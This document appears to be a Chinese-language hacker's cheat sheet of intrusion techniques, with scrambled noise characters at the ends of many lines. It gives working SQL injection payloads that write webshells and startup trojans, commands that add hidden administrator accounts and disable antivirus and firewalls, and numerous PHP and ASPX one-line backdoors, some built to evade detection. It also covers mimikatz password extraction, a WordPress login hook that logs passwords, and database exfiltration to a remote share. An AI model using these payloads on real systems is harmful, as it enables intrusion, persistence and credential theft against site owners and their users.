9 Q6 v; u; M: X' F$ n, G% Y中文版本操作系统中针对mysql添加用户完整代码:. X* L( y( l f% O
) Y9 v7 o. O3 A- F3 Z0 z' {7 S( R
use test;* i0 K( R$ u# A' r$ b! p
create table a (cmd text);
6 t! N% [1 \5 b4 ^insert into a values ("set wshshell=createobject (""wscript.shell"") " );
" s+ K: q( o7 K7 D u" G6 Xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 m1 @' h# E. r2 R1 k$ K
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; K6 R1 e! z' e& x9 Yselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";+ V8 p+ q1 H7 ? d
drop table a;1 Y( W) m2 t5 W( t1 N* I1 _6 K+ }
$ M' H8 w& M% `, C* E; D7 b
英文版本:6 ^) j$ C* g& F0 t# s
/ C' K) D. ^% t- c/ c$ d uuse test;
q" _1 s6 X% j3 ?; |7 @# C" jcreate table a (cmd text);
2 B, O6 p5 c7 J& S% \# @insert into a values ("set wshshell=createobject (""wscript.shell"") " );, l/ A; \9 m" w0 U! z- B
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );9 K) E+ `( r& |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );4 N( U' ^' H" w, M1 s
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";3 A+ {- N* s' P+ Z- y4 o- o; d
drop table a;
& J& S I7 J9 ?# @& h- L9 {7 t! d" ]: H
create table a (cmd BLOB);
: p k: h/ g9 i M% ~2 q1 D7 `# Einsert into a values (CONVERT(木马的16进制代码,CHAR));
3 b- b% f J Y* W4 W1 }. aselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'. j0 j. i0 ]: A" s. V4 j
drop table a;+ B/ o/ r+ O0 p% A( d
4 R6 D1 B+ A6 X
记录一下怎么处理变态诺顿
( A$ M/ L) ~. o! y查看诺顿服务的路径6 D6 f! H/ N$ Q# N6 ~
sc qc ccSetMgr: g+ i5 n' h0 f$ O
然后设置权限拒绝访问。做绝一点。。$ n1 x: n' ]4 T% c% X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
8 X0 x9 |: ]3 }; rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
# B. R' D: l7 d; G6 U/ Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators, i! e- U6 {: V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
1 Z4 I }: K' E7 c* K% ]6 E% K5 V& _' n6 j
然后再重启服务器
: y/ }( n& z% X* s' k y, M2 giisreset /reboot+ r7 R$ i- l: ?; W* r- C
这样就搞定了。。不过完事后。记得恢复权限。。。。
; {' ~8 H$ O+ rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F: p3 v/ }# ^8 P/ |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F: u- z7 ?/ g) f% r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
* S; r$ b L& G6 pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
7 ~: t7 g( |. A- G7 Q# z# c% ISELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin$ |' T+ Q, ]8 R p/ o4 {
# d- q* p5 _ D& A" JEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')$ z+ A+ Q9 b8 ^( A6 O6 i
4 J; X, g( ^& c2 t* @* Bpostgresql注射的一些东西
# _8 c# ?/ a T3 R, @如何获得webshell7 }$ L; f8 K v
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
% M+ `: E+ K8 }# I7 H3 \) m' G! z) U5 Q$ Yhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 c; ~) U6 {: m' Zhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
. C) `1 ]$ y3 D. \如何读文件
5 j9 g- ~# F4 x( Hhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);/ W$ [1 B8 n( r5 F F
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
9 O: R/ C7 o( y9 b+ H7 qhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;3 k1 p/ a4 m9 l- C) E
8 _4 P, t9 V) w. ?0 b
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
; \) S9 }9 \* R' m8 t# l8 x当然,这些的postgresql的数据库版本必须大于8.X: m( ?; q4 g+ U
创建一个system的函数:
7 q3 f* z3 T6 _8 YCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT( Y: _. l4 B! A' W/ v
% p' d2 V- z5 n4 _3 p" Z
创建一个输出表:6 I; ?+ C/ `) q! ~& e" o
CREATE TABLE stdout(id serial, system_out text)0 B" v% v, [$ |( [
( ?3 e+ O1 }! g j. b& }
执行shell,输出到输出表内:0 l) C% W- @/ |2 D
SELECT system('uname -a > /tmp/test')
7 P# s7 z& G0 N# E) g$ ]2 h% }! U% x2 ^" u# }* t' @1 i
copy 输出的内容到表里面;
3 X% h+ N# \7 J" }; K* n* ?COPY stdout(system_out) FROM '/tmp/test'
5 ~+ [( `3 `9 V& r) l1 L# H+ x& V; ]
从输出表内读取执行后的回显,判断是否执行成功
6 x* Q$ [; M: Q' K* S) I ^, h' J$ I6 i/ `$ J& v* o
SELECT system_out FROM stdout
6 T; R, N9 V! \; b! n- q; n& V2 m4 J下面是测试例子
& H, C9 y5 r% ?4 y" V/ _. U
, v: b7 F! ?& b/ B. C/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
, K. Y# k$ Y, C# K5 x8 T5 P3 d
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'$ O e6 ~9 J+ \5 _9 L, R
STRICT --
5 s' {3 X& V7 }+ C
! u6 [3 O: g) A3 s/store.php?id=1; SELECT system('uname -a > /tmp/test') --: [5 [8 I& u& G0 t) R H
" U. @1 Z8 }7 Z3 J' F/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
3 u# p, g. x1 W6 m6 \0 W3 {8 g
% j: h) n6 ~* w7 a" [/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--1 _+ p8 |% Z& H$ l( u
net stop sharedaccess stop the default firewall
( x. A+ H: e0 i$ u* enetsh firewall show show/config default firewall
$ a5 _ @% W# {; H4 e! ynetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall& u" x' a* T9 T" V
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
( }- \& O9 n# _1 ]! f @ q' k* c修改3389端口方法(修改后不易被扫出): z5 M) u9 _3 ]7 h8 u0 _
修改服务器端的端口设置,注册表有2个地方需要修改
Z0 n/ s z4 H% k8 G @* W- t- v2 m: w- d' p6 l9 [: l9 g
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]. I n. u" C h" g M3 G* m
PortNumber值,默认是3389,修改成所希望的端口,比如6000
" i7 Q- K$ {5 l# W7 e1 ?# ?
3 W5 I$ ^2 a6 \( m第二个地方:3 l' A) [3 i. |. o+ x& I
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] - R! D2 k1 Y B
PortNumber值,默认是3389,修改成所希望的端口,比如6000 ~5 X( o8 [% k4 \8 u/ ]1 W
, A! B. i" x- a
现在这样就可以了。重启系统就可以了
, P- K+ ^3 u. y* P4 {! q: W
: C% T' q7 k5 C2 ` Z" A3 k查看3389远程登录的脚本
7 ?2 `8 O; R8 t1 O) o: b/ S4 M. p保存为一个bat文件
3 n# M f& p2 {+ Q3 R$ }5 Cdate /t >>D:\sec\TSlog\ts.log
5 O. i9 f4 U) {' V6 btime /t >>D:\sec\TSlog\ts.log
* _) C' v8 \7 H7 I* y0 v& b; l) Tnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log6 R. P8 \9 z0 l; F
start Explorer
2 I) d) n H1 W/ `2 P7 f# f
/ L) \5 S9 U& fmstsc的参数:
0 a& ? P" q1 R1 u
; o1 |! p6 F" t2 |5 ~- Y远程桌面连接
# p8 X; I+ K5 ^* b4 H F( h0 \- ?9 b6 m' n9 B. H, E
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]], x0 W* B+ J E' R2 q- a* {) b; W
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
+ k: a# H T0 N. z6 s" j+ {+ _# X4 V: P* J
# R9 N' ?4 J' |) Z3 I% \+ Z/ a1 m<Connection File> -- 指定连接的 .rdp 文件的名称。
" D& ^( i) x1 M" i3 @
# L' y1 V+ V% L+ U8 q* q/v:<server[:port]> -- 指定要连接到的终端服务器。6 W4 q. d. c) ]
( ^! Y0 A0 v3 n& m( y& y8 w% h; |( {
/console -- 连接到服务器的控制台会话。0 y. I& t$ q, {) Q
: C6 @4 f% ]/ B- ]
/f -- 以全屏模式启动客户端。" \7 i r2 e! e! C, Q F
2 T8 l5 ?( a1 R& K( o: ~/ o: B/w:<width> -- 指定远程桌面屏幕的宽度。
) x! j3 Q6 A* }: ~9 s2 S4 _* ^9 {5 P
/h:<height> -- 指定远程桌面屏幕的高度。
! Z, F9 U$ Q) R( d
& T7 U+ K9 l a$ f$ o) w2 V, s/edit -- 打开指定的 .rdp 文件来编辑。
" X# m+ ]/ f7 ]; S& j1 @+ f4 o. I7 C# I8 a! N8 i# `
/migrate -- 将客户端连接管理器创建的旧版
5 [4 n8 T- N( a0 r% W9 g& |* L, j连接文件迁移到新的 .rdp 连接文件。 I' A9 s2 m( Q( H: m! o
: A# m/ K g- q! @- ~# Q7 R/ z# z; U5 H# m
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就1 q# {3 V/ H( H A' i' M
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
' H( t4 v, b) z1 x" K* W" B& m. n! D: U* `/ Q
命令行下开启3389$ e" R9 Q. B, @8 A" p* t
net user asp.net aspnet /add- u( E7 {' b& k7 F5 S
net localgroup Administrators asp.net /add
0 \4 e2 N5 s% R, r8 X* @+ L$ c3 Vnet localgroup "Remote Desktop Users" asp.net /add
6 ?* ] T/ N- Z. P1 A |0 Wattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D! c2 G3 v. O& \
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
/ u7 e1 P- L( [8 w# Necho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
, D$ e, q+ I# n) g: N6 Hecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f0 Y8 }( S: i3 z" ? j, h* y8 F6 B
sc config rasman start= auto
$ t7 k( T# ]1 ]sc config remoteaccess start= auto* \+ B. w, u) b* D7 [/ d: u
net start rasman. g {. c6 F7 n! u! k$ t( w
net start remoteaccess
/ ?7 Z Z) Q ^ ]; FMedia! [2 B; A+ P9 r5 Q/ h& W
<form id="frmUpload" enctype="multipart/form-data"
% t7 x& ?( g# z5 Yaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
' m" V, D/ s }! i) w1 r- N<input type="file" name="NewFile" size="50"><br>
, N: x: H; x' o" o9 c<input id="btnUpload" type="submit" value="Upload">+ @0 t$ |) _. z' ~& B
</form>: A1 D$ R6 g! Y. l- Q
" b- `" c3 z$ r+ o# F; S- Ncontrol userpasswords2 查看用户的密码! N+ ?- M$ ]8 ~3 f* |# R
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
$ _/ ?1 d- s Q" s5 J5 Z9 y$ D& ZSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a9 j5 N' @& l8 G8 R7 v+ [" A
( R& o, `# p+ t: H" j141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:( i& F$ a# f! a. c; t
测试1:- w2 n* k- C% r/ D6 n( m
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# k& f4 I5 C; Q: F8 q+ Z: I1 C* @- }, f* F
测试2:
( X; r1 G+ W. u7 e
/ `: |, f3 [( Z' Y# acreate table dirs(paths varchar(100),paths1 varchar(100), id int)" J7 F5 b$ p% Z! ?
( N# `" h4 O) }1 j6 \% ]4 W t
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--; p% f* v x/ ^( s) ?+ I
; f% T7 ^/ T4 r: M( c2 l
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
3 L$ U& e! R9 H0 ^0 S关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
% y+ w4 g2 D: | e- p7 h: Z0 m可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;; U+ j6 K/ V/ X, }. z
net stop mcafeeframework5 p9 h4 c$ ]" C4 C1 \0 Z/ V' _$ W
net stop mcshield5 M, p2 m' D8 J# t: ?- F) ?7 O; Z: k6 T3 s
net stop mcafeeengineservice
; a) I! o; m( U% Q" onet stop mctaskmanager9 y# j/ l+ B o$ k1 \
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D5 @/ |6 L6 U" Q/ W+ ~% m
7 ]9 {4 @$ T' q9 t1 |( T% y VNCDump.zip (4.76 KB, 下载次数: 1) , U+ A2 D5 w9 X* L5 U1 M; } m2 W
密码在线破解http://tools88.com/safe/vnc.php
# E% h# v: ^8 Z5 U/ ZVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
0 a) c. W! }' G& Q1 D& e- g0 ]3 H; D5 g: t x( C& C+ M) u
exec master..xp_cmdshell 'net user'2 x3 G0 L6 J0 X) v( V" o5 F& m
mssql执行命令。
6 P9 j, m. A$ U获取mssql的密码hash查询
S# }2 D7 a" M- [# ~select name,password from master.dbo.sysxlogins
8 Z; \* Y. f5 ~1 W) W% x; u _% f0 ?$ j6 a1 I
backup log dbName with NO_LOG;5 O& S+ o+ C# t: J/ f! j
backup log dbName with TRUNCATE_ONLY;- t; L6 |, }8 b/ O, U1 E) \6 n9 v! V" m
DBCC SHRINKDATABASE(dbName);
. z; d2 G, v* {8 g* C: wmssql数据库压缩/ [0 D ~) n! v
2 a+ [. f3 T$ j2 yRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK7 \$ n7 f4 b/ F
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
5 a$ Z# K1 U3 p+ f! U! U4 Q" H' p2 X$ ]4 n; F+ a% L
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
! e C! V$ k8 @& J) v8 q. U0 U' ]备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak; S& L; Y; j# a4 _" _" n" Y6 S
% [/ p' e. w1 R' F9 PDiscuz!nt35渗透要点:0 o/ ]4 T/ ]: L6 ~
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default# V; j' }& S* g4 V( i
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>4 N. M# [) k y' f. V' o
(3)保存。
! N) r+ k8 V# m; j$ b1 K; U% U(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
& l% h% ^/ s5 a0 M* N% T; e% K2 Md:\rar.exe a -r d:\1.rar d:\website\2 `8 k* S; G/ E4 G- F
递归压缩website5 X4 X: c* v5 A% m* \% y4 J
注意rar.exe的路径1 e7 ^9 r7 v# ?. o0 Q: M
( U, c: Q) T+ s2 t9 ~% K7 E<?php
& r# M1 y! ?! x! b6 ^4 I
* p" E! Y% `+ D0 L8 Z8 b* i3 i$telok = "0${@eval($_POST[xxoo])}";
3 ]& ]4 x* c1 @; a
% }$ Q* ~9 f& r! a; a k1 }$username = "123456";
1 u9 C5 g5 L2 _" l j6 L
5 G7 |" \+ W! a1 ^9 n; b1 M$userpwd = "123456";
& V1 s6 S# a6 N$ v9 X- O3 k9 H6 Y. t8 o% X: V2 k& |. Z
$telhao = "123456";: Y9 z9 Q2 O4 L* Q9 K
# Y1 Z' s: j- g# [6 T) G: _
$telinfo = "123456";; C8 c) L. ~2 U4 n9 w
( I+ P6 c( M$ p7 ~' P4 Y0 ~% p6 J?>, ~' O+ h6 s* G+ _- t
php一句话未过滤插入一句话木马
0 X: D/ K; ]) {8 d7 r: C4 M
1 V9 u {, \: L; |' b% Z" }站库分离脱裤技巧+ t/ U e6 q: R9 A
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'9 n& `+ s1 q" m F) r" |4 b
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
2 m/ y* E7 |- H6 N( g8 ]4 [6 ?+ v条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。/ F8 _' U/ [ e* H3 B. a& k
这儿利用的是马儿的专家模式(自己写代码)。: i7 m/ z( Q2 E8 v# ~$ Z# V% A$ y
ini_set('display_errors', 1);& g; W# P/ W/ J$ H
set_time_limit(0);6 A/ \# K& ]5 G2 T
error_reporting(E_ALL);
) O1 O! u* Z3 | f g% V' J8 L% g$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());4 F0 j- Y" i: ]
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
% a5 p) P5 o) X1 t* K$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());- R: Z# m* v- j2 j6 w
$i = 0;" `4 O+ B$ V1 P0 z
$tmp = '';
( ]. k6 y5 K, Z$ @: J5 ]while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
% Z3 t$ V& F' E* @ $i = $i+1;9 b, }* y* X6 F V2 G; }
$tmp .= implode("::", $row)."\n";
( [: Q& S9 q3 o2 F5 V6 F if(!($i%500)){//500条写入一个文件" [" V) H! D' w
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
2 g# o3 P* H% L. [" Y! @& K Y file_put_contents($filename,$tmp);
" ^1 F( M9 S+ K0 e% p$ P: { $tmp = '';' |( J! c2 R3 N r- B: l6 ^
}( R4 p8 E5 w* I% Z
}
% G0 S; m' Z0 U5 r. kmysql_free_result($result);7 b0 j1 L7 _& z) g/ p. a" a
1 A4 h0 T$ M+ a5 N/ x
. M3 d0 f3 q( W/ p
+ ]/ J( _" X5 ^
//down完后delete; m5 _) @+ Y: h1 G* m
2 v$ C: \' ?8 ~2 R5 P: h$ E
+ ~. [+ f4 q( d* y: q# N2 d+ W0 Iini_set('display_errors', 1);# i9 X0 L( u0 {# u$ D) ~5 a ?9 A
error_reporting(E_ALL);1 \6 b- n" x6 R8 D' `
$i = 0;8 g w w; L3 w3 Q5 _! j+ Y, N: z
while($i<32) {
H# c- V7 I' D" E! F3 }* C) j7 x $i = $i+1;* l4 v$ U% n, M0 _, P% |
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';# R; T, Q3 L6 O9 w5 W
unlink($filename);. O8 y$ O/ R+ u" J3 y' ^: |
} 1 b) f8 u; @/ C# y
httprint 收集操作系统指纹
+ z z: _( A+ t: V扫描192.168.1.100的所有端口2 N1 |- e4 L) s9 B% c& P c% `. e9 ~
nmap –PN –sT –sV –p0-65535 192.168.1.100# ?' Y# I) O2 X3 X
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
- h3 @% a# x- [# j- whost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
r' d; S+ _# J, F+ l/ _* tNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host, R# G7 g. f7 Z H6 k$ C
( v5 C+ F/ B+ q) ~0 T0 hDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
6 W( w A3 N7 Y2 ~. F2 a
; O; k9 F) R# }2 g f! O MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)( I" [0 q4 @2 g5 A
% P2 `' T8 e. m Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
7 N3 w ~1 U) a2 B9 n/ i, j" Y
5 b; }$ _& G# E2 M6 i# P7 G DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 a3 ^2 m% N1 }4 G4 l, \' v; U1 s4 o& @* C, Q D- M6 G
http://net-square.com/msnpawn/index.shtml (要求安装)
) n: ]( j5 V! `9 d7 N
9 D6 ]+ Q3 w+ P tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)2 h. l D2 q. d8 N, j1 M, @2 m
4 \8 O% ?; r ? b! B- { }! U
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)- F7 r' ^3 v2 n j
set names gb2312
; v6 j+ C& _( k. `导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。$ T/ `, |, I9 ?4 `4 U
$ _9 u0 l- ~: ]7 w
mysql 密码修改: ]: v" [! s, j2 M
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
5 c5 E* c& |# e: y' i Rupdate user set password=PASSWORD('antian365.com') where user='root';; x1 B6 B+ O* H8 e# a
flush privileges;
. V0 a1 a# D6 n( D, e% n高级的PHP一句话木马后门/ y: I( L; }. u h* v- B2 ~
7 r" S T- b" C) P1 A# y5 d入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀' m* o, Y5 R1 Y+ B/ Q1 f& h
O: X4 ^) Q0 I' ?: _* H1 K+ n( l1、; R( b) x U, y$ ]
) B+ V; F2 {# M8 a" H# ]) E
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";% x1 ^' H+ s. z8 w% k2 k
% k. J. O5 A* O L; D8 y
$hh("/[discuz]/e",$_POST['h'],"Access");
+ [( i; _1 K {! N: ]0 L
1 @+ g6 p- T( N! m4 h; U! N//菜刀一句话5 Z. h" e1 } l2 i3 _9 P
" a7 f" b) }7 }$ ^8 w" X2 h% u
2、6 L' @! h! n( P* I) S# J' J
# @: e' [0 M0 Z: s" W7 D( F. @
$filename=$_GET['xbid'];
3 ]" h: j. L- L( E5 x0 `- w# @8 F
$ g/ p) Z: r8 G# Z( @( R, vinclude ($filename);
- d3 t0 D$ O& d B* w' e( H% x
* B$ j; k1 _9 R9 d+ h8 J K( n//危险的include函数,直接编译任何文件为php格式运行
. [+ _0 n" K4 l4 n8 A; O/ J, B9 M; l5 S4 V" Y. U
3、; p0 P; g9 C% E( ~( u1 j
- \3 y, K" y1 D! H; y$reg="c"."o"."p"."y";
' i) o2 x% ?+ [, s n9 Y' O9 t
8 k N r% x" E5 i$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);; ?3 X# v+ |5 N. b3 P% ~
: x1 c! p W, K" u1 L7 h//重命名任何文件
" e g8 M* |3 g0 j4 Y+ d9 L$ b* e2 r
* q+ ]( Q( v7 B' l4、
! k8 e( T5 d. D* S& _& o! H
% T/ H9 ^5 G+ N" H: U. g( `2 u/ D$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";% _8 E5 A" ^. K2 H' @ p3 o7 P
; C. i" n9 l: R, o6 p, E
$gzid("/[discuz]/e",$_POST['h'],"Access");+ i& q( n) E# ^/ N$ A+ L
6 ?+ O" R: }' j//菜刀一句话% G8 H7 K/ @ z y: @
$ B r$ ]) v7 o! V& Z) S( I5、include ($uid);
6 B' v1 S r, u1 J9 S
2 k! D, G! r1 D* k, c/ r8 s//危险的include函数,直接编译任何文件为php格式运行,POST % U: h5 ?; d4 }3 P! F/ s/ F. L
. S' D! i! `. C# X9 E
# A8 l: J, t' z8 q$ `2 X5 D
//gif插一句话& X; K* z4 A$ R
9 j6 N7 r: g. i3 [ H% e6、典型一句话
7 |. B) o: p3 Q2 r$ j2 d6 C- U3 E$ K) l* Z
程序后门代码+ |4 g; A; w9 Q2 A# S- y5 D
<?php eval_r($_POST[sb])?>
# \. n) W- s( B. Z程序代码) S# \1 t7 @) V& F2 H* N: s
<?php @eval_r($_POST[sb])?>7 P6 X+ P. v. E) O# `7 c' a6 x. X5 c" B
//容错代码% H2 A$ h; {- d* o5 d' z6 P8 A4 ]
程序代码
/ h0 |& q- F& y* s! _8 r3 [0 J<?php assert($_POST[sb]);?>, b7 l$ E7 u7 E5 Q: F
//使用lanker一句话客户端的专家模式执行相关的php语句+ u2 ]% y1 c3 ?8 y' {1 p0 }" I8 ?
程序代码; m8 s; [8 h8 D+ M& f
<?$_POST['sa']($_POST['sb']);?>
: w2 C$ K) Q; d3 r! r0 `# f程序代码
7 g8 P, t1 T0 _- U<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>* P K1 s: D- y* V7 _
程序代码
( p) l6 K0 q* C7 ?3 z- K& g0 a7 q8 n<?php, ]6 s/ Z& E* h& H
@preg_replace("/[email]/e",$_POST['h'],"error");; n4 ~( g/ [2 I
?>5 G( T* s8 Y% w( q
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入- b" J2 d: n6 v6 g# [3 F* p8 }
程序代码
0 `# ?0 N" M% P/ l+ D, r" B<O>h=@eval_r($_POST[c]);</O>8 i7 o$ L; }/ S3 w" B/ k
程序代码
: j- t c3 ]" L* K6 q# {<script language="php">@eval_r($_POST[sb])</script>4 X. H" F& i, N9 _3 W, D& X
//绕过<?限制的一句话$ F! K' I4 r! B7 [; o; r$ S
, ]3 o# b) `/ L/ h9 s; ^% _2 v/ h
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
) ?3 i) p8 H3 b详细用法:
; Y3 }/ Q/ C$ G% W1 t1、到tools目录。psexec \\127.0.0.1 cmd
" s* I4 ]3 H" v2 K& G2、执行mimikatz
( K* y$ c; z# }# \, O% |. Q! }4 h3、执行 privilege::debug
) t; A, k& a" V- _6 L3 U3 \' g4、执行 inject::process lsass.exe sekurlsa.dll3 P" [: C/ e( h
5、执行@getLogonPasswords& G! x, c3 C9 i% _1 h0 J! U3 B4 c
6、widget就是密码9 u' F8 ]: X3 O0 W
7、exit退出,不要直接关闭否则系统会崩溃。; z2 x7 c" m; X- G i
/ ^6 f" ]1 b3 o" c) N
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面3 V3 D% T0 z6 c7 o
7 P. q F% D$ k: v8 H0 Y
自动查找系统高危补丁- _2 J+ r! q; Y. n. f6 j0 Y' g" f
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
0 R& f% G( B1 c: W9 a% A# P4 N
4 E* ~: @* G1 p+ ?突破安全狗的一句话aspx后门1 X" Z% ?6 V8 {2 |( C' c
<%@ Page Language="C#" ValidateRequest="false" %>
8 N% _+ j; x! N. c+ o$ M<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>; {( m7 ?3 R7 z7 f
webshell下记录WordPress登陆密码
7 n+ M. a) m- L2 r! L. l" Q1 S$ jwebshell下记录Wordpress登陆密码方便进一步社工* ~- W& ^& H1 n) u! `1 H5 `$ @
在文件wp-login.php中539行处添加:( P) V1 N$ o: i, }# b
// log password q1 O: E; s" v) V+ F! v$ O
$log_user=$_POST['log'];& }4 \5 [9 q8 S F" A
$log_pwd=$_POST['pwd'];
( W. P+ V4 O8 j$log_ip=$_SERVER["REMOTE_ADDR"];
~1 C/ ^/ V1 Y; `9 I' c$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
/ ~6 i; \/ T5 k: k/ Q# x$txt=$txt.”\r\n”;
3 {9 J$ I) Z% R; V) K9 ` v! M; dif($log_user&&$log_pwd&&$log_ip){
9 N! g0 |- J$ W7 B% h2 d, [3 L@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# s8 b7 @/ s8 \$ O m6 u9 e
}
